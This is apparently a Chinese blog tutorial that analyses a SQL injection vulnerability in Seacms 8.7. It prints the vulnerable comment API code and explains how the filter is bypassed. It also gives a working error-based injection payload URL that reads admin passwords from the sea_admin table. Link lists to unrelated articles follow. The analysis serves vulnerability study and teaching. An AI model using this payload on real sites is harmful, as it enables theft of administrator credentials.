有些小伙伴刚刚接触SQL编程,对SQL注入表示不太了解。其实在Web攻防中,SQL注入就是一个技能繁杂项,为了帮助大家能更好的理解和掌握,今天小编将要跟大家分享一下关于Seacms 8.7版本SQL注入分析的内容,一定要认真学习哦。

0x01环境

Web:phpstudy and MAMP

System:Windows 7 X64 and MacOS

Browser:Firefox Quantum and Chrome

MySQL:5.5

php:5.4

0x02漏洞详情

漏洞复现

payload:

http://10.211.55.4/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`

漏洞分析

之前在MySQL 5.6、5.7上面复现都不成功,因为这两个版本用extractvalue( )、updatexml( )报错注入不成功,后来换了系统Linux和Windows还有macOS来测试也是一样,和PHP、Apache的版本没有影响,还是MySQL的版本问题,所以大家测试的时候注意一下版本。

漏洞文件是在:comment/api/index.php

<?php

session_start();

require_once("../../include/common.php");

$id = (isset($gid) && is_numeric($gid)) ? $gid : 0;

$page = (isset($page) && is_numeric($page)) ? $page : 1;

$type = (isset($type) && is_numeric($type)) ? $type : 1;

$pCount = 0;

$jsoncachefile = sea_DATA."/cache/review/$type/$id.js";

//缓存第一页的评论

if($page<2)

{

 if(file_exists($jsoncachefile))

 {

 $json=LoadFile($jsoncachefile);

 die($json);

 }

}

$h = ReadData($id,$page);

$rlist = array();

if($page<2)

{

 createTextFile($h,$jsoncachefile);

}

die($h);

function ReadData($id,$page)

{

 global $type,$pCount,$rlist;

 $ret = array("","",$page,0,10,$type,$id);

 if($id>0)

 {

 $ret[0] = Readmlist($id,$page,$ret[4]);

 $ret[3] = $pCount;

 $x = implode(',',$rlist);

 if(!empty($x))

 {

 $ret[1] = Readrlist($x,1,10000);

 }

 }

 $readData = FormatJson($ret);

 return $readData;

}

function Readmlist($id,$page,$size)

{

 global $dsql,$type,$pCount,$rlist;

 $ml=array();

 if($id>0)

 {

 $sqlCount = "SELECT count(*) as dd FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC";

 $rs = $dsql ->GetOne($sqlCount);

 $pCount = ceil($rs['dd']/$size);

 $sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC limit ".($page-1)*$size.",$size ";

 $dsql->setQuery($sql);

 $dsql->Execute('commentmlist');

 while($row=$dsql->GetArray('commentmlist'))

 {

 $row['reply'].=ReadReplyID($id,$row['reply'],$rlist);

 $ml[]="{\"cmid\":".$row['id'].",\"uid\":".$row['uid'].",\"tmp\":\"\",\"nick\":\"".$row['username']."\",\"face\":\"\",\"star\":\"\",\"anony\":".(empty($row['username'])?1:0).",\"from\":\"".$row['username']."\",\"time\":\"".date("Y/n/j H:i:s",$row['dtime'])."\",\"reply\":\"".$row['reply']."\",\"content\":\"".$row['msg']."\",\"agree\":".$row['agree'].",\"aginst\":".$row['anti'].",\"pic\":\"".$row['pic']."\",\"vote\":\"".$row['vote']."\",\"allow\":\"".(empty($row['anti'])?0:1)."\",\"check\":\"".$row['ischeck']."\"}";

 }

 }

 $readmlist=join($ml,",");

 return $readmlist;

}

function Readrlist($ids,$page,$size)

{

 global $dsql,$type;

 $rl=array();

 $sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND id in ($ids) ORDER BY id DESC";

 $dsql->setQuery($sql);

 $dsql->Execute('commentrlist');

 while($row=$dsql->GetArray('commentrlist'))

 {

 $rl[]="\"".$row['id']."\":{\"uid\":".$row['uid'].",\"tmp\":\"\",\"nick\":\"".$row['username']."\",\"face\":\"\",\"star\":\"\",\"anony\":".(empty($row['username'])?1:0).",\"from\":\"".$row['username']."\",\"time\":\"".$row['dtime']."\",\"reply\":\"".$row['reply']."\",\"content\":\"".$row['msg']."\",\"agree\":".$row['agree'].",\"aginst\":".$row['anti'].",\"pic\":\"".$row['pic']."\",\"vote\":\"".$row['vote']."\",\"allow\":\"".(empty($row['anti'])?0:1)."\",\"check\":\"".$row['ischeck']."\"}";

 }

 $readrlist=join($rl,",");

 return $readrlist;

}

传入$rlist的值为我们构造的SQL语句:

@`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select (password)from sea_admin))),@`'`

通过ReadData函数,implode处理后传入Readrlist函数。

可以看到执行的SQL语句是:

它在$dsql->Execute('commentrlist');这句的时候会有一个SQL的安全检测。

文件在include/sql.class.php的CheckSql函数

//完整的SQL检查

 while (true)

 {

 $pos = strpos($db_string, '\'', $pos + 1);

 if ($pos === false)

 {

 break;

 }

 $clean .= substr($db_string, $old_pos, $pos - $old_pos);

 while (true)

 {

 $pos1 = strpos($db_string, '\'', $pos + 1);

 $pos2 = strpos($db_string, '\\', $pos + 1);

 if ($pos1 === false)

 {

 break;

 }

 elseif ($pos2 == false || $pos2 > $pos1)

 {

 $pos = $pos1;

 break;

 }

 $pos = $pos2 + 1;

 }

 $clean .= '$s$';

 $old_pos = $pos + 1;

 }

 $clean .= substr($db_string, $old_pos);

 $clean = trim(strtolower(preg_replace(array('~\s+~s' ), array(' '), $clean)));

可以看到这里没有把我们的报错函数部分代入进去,如果代入进去检测的话就会在这里检测到:

后面$clean就是要送去检测的函数,通过一番处理后得到的值为:

后面返回来执行的SQL语句还是原样没动

以上基本分析就完成了。

最终执行的语句:

SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=1 AND id in (@`\'`, extractvalue(1, concat_ws(0x20, 0x5c,(select (password)from sea_admin))),@`\'`) ORDER BY id DESC

还有一些问题就是构造语句的问题。

刚开始传入的%27后面怎么变成了转义后的单引号?

require_once("../../include/common.php");就包含了这个文件,里面有一个_RunMagicQuotes函数,如果PHP配置没有开启get_magic_quotes_gpc就会用到这个函数,这个函数是把值经过addslashes函数的处理。此函数的作用是为所有的 ' (单引号), \" (双引号), \ (反斜线) and 空字符和以会自动转为含有反斜线的转义字符。

所以后面的SQL语句就会加上转义符号,然后经过CheckSql函数的时候就绕过了对报错语句的检测。

function _RunMagicQuotes(&$svar)

{

 if(!get_magic_quotes_gpc())

 {

 if( is_array($svar) )

 {

 foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);

 }

 else

 {

 $svar = addslashes($svar);

 }

 }

 return $svar;

}

为什么要加上``两个反引号和@?

因in在MySQL里面用法是:

value1必须是一个值,整数型或者文本型都可以,如果用单引号的话就会变成三个转义\'\'\'

在MySQL上面是作为一个转义符号来使用,一般为了不让和系统的变量冲突所以使用,一般在数据库名、表名、字段名使用,所以这里用@来使这个成为一个变量类型。

后记

在6.53的版本中include/common.php中的44-47行接收到变量:

foreach(Array('_GET','_POST','_COOKIE') as $_request)

{

 foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);

}

但是在75行这里又重新赋值了:

require_once(sea_DATA."/config.cache.inc.php");

以上是今天的全部内容,大家学会了吗?

技能提升丨Seacms 8.7版本SQL注入分析的更多相关文章

  1. ThinkPHP最新版本SQL注入漏洞

    如下controller即可触发SQL注入: code 区域 public function test() { $uname = I('get.uname'); $u = M('user')-> ...

  2. 动态分析小示例| 08CMS SQL 注入分析

    i春秋作家:yanzm 0×00 背景 本周,拿到一个源码素材是08cms的,这个源码在官网中没有开源下载,需要进行购买,由某师傅提供的,审计的时候发现这个CMS数据传递比较复杂,使用静态分析的方式不 ...

  3. 动态调试|Maccms SQL 注入分析(附注入盲注脚本)

    0x01 前言 已经有一周没发表文章了,一个朋友叫我研究maccms的代码审计,碰到这个注入的漏洞挺有趣的,就在此写一篇分析文. 0x02 环境 Web: phpstudySystem: Window ...

  4. 通达OA<=11.5版本SQL注入——日程安排

    注入点产生位置

  5. ThinkPHP 5.0.x SQL注入分析

    前言 前段时间,晴天师傅在朋友圈发了一张ThinkPHP 注入的截图.最近几天忙于找工作的事情,没来得及看.趁着中午赶紧搭起环境分析一波.Think PHP就不介绍了,搞PHP的都应该知道. 环境搭建 ...

  6. Discuz 5.x/6.x/7.x投票SQL注入分析

    看乌云有人爆了这个漏洞:http://www.wooyun.org/bugs/wooyun-2014-071516感觉应该是editpost.inc.php里投票的漏洞.因为dz已经确定不会再修补7. ...

  7. sql注入分析

    输入 1:sql为:select * from users where id = 1; 输入'测试:回显:You have an error in your SQL syntax; check the ...

  8. 转:攻击JavaWeb应用[4]-SQL注入[2]

    转:http://static.hx99.net/static/drops/tips-288.html 攻击JavaWeb应用[4]-SQL注入[2] 园长 · 2013/07/18 17:23 注: ...

  9. Vtiger CRM 几处SQL注入漏洞分析,测试工程师可借鉴

    本文由云+社区发表 0x00 前言 干白盒审计有小半年了,大部分是业务上的代码,逻辑的复杂度和功能模块结构都比较简单,干久了收获也就一般,有机会接触一个成熟的产品(vtiger CRM)进行白盒审计, ...

随机推荐

  1. 1.Spring Framework 5.0 入门篇

    1.为什么学习Spring? 随着对Java EE的不断接触和理解,你会发现Spring  在各个企业和项目中发挥着越来越重要的作用.掌握Spring 已成为我们IT行业生存必学的本领之一. Spri ...

  2. REST风格框架实战:从MVC到前后端分离(附完整Demo)

    既然MVC模式这么好,难道它就没有不足的地方吗?我认为MVC至少有以下三点不足:(1)每次请求必须经过“控制器->模型->视图”这个流程,用户才能看到最终的展现的界面,这个过程似乎有些复杂 ...

  3. async 和 await 之异步编程的学习

    async修改一个方法,表示其为异步方法.而await表示等待一个异步任务的执行.js方面,在es7中开始得以支持:而.net在c#5.0开始支持.本文章将分别简单介绍他们在js和.net中的基本用法 ...

  4. app的安装与卸载测试点

    安装 1)软件在不同操作系统(Palm OS.Symbian.Linux.Android.iOS.Black Berry OS .Windows Phone )下安装是否正常. 2)软件安装后的是否能 ...

  5. node npm --save,不同JS解析器的内置全局变量,PROMISE,CONST---ES6

    npm  --save 当你为你的模块安装一个依赖模块时,正常情况下你得先安装他们(在模块根目录下npm install module-name),然后连同版本号手动将他们添加到模块配置文件packa ...

  6. sql server 内存初探

    一. 前言 对于sql server 这个产品来说,内存这块是最重要的一个资源, 当我们新建一个会话,相同的sql语句查询第二次查询时间往往会比第一次快,特别是在sql统计或大量查询数据输出时,会有这 ...

  7. Mave手动安装jar包

    今天配置Maven项目时有一个相应的jdbc驱动jar包导不进去,就自己导入了. 首先在官网上下载该jar包,地址为http://mvnrepository.com/ 点击jar下载. 用maven命 ...

  8. 【BZOJ 3561】 DZY Loves Math VI

    题目: 给定正整数n,m.求   题解: 水题有益身心健康.(博客园的辣鸡数学公式) 其实到这我想强上伯努利数,然后发现$n^2$的伯努利数,emmmmmm 发现这个式子可以算时间复杂度,emmmmm ...

  9. 【BZOJ2339】【HNOI2011】卡农

    题解: 首先用二进制表示每个音阶是否使用,那么共有$2^{n}-1$(空集不可行)种片段,用$a_{i}$来表示每个片段,问题就是求满足$a_{1}\left (xor\right)a_{2}\lef ...

  10. bzoj 3505 [Cqoi2014]数三角形 组合

    ans=所有的三点排列-共行的-共列的-斜着一条线的 斜着的枚举每个点和原点的gcd,反过来也可以,还能左右,上下挪 #include<cstdio> #include<cstrin ...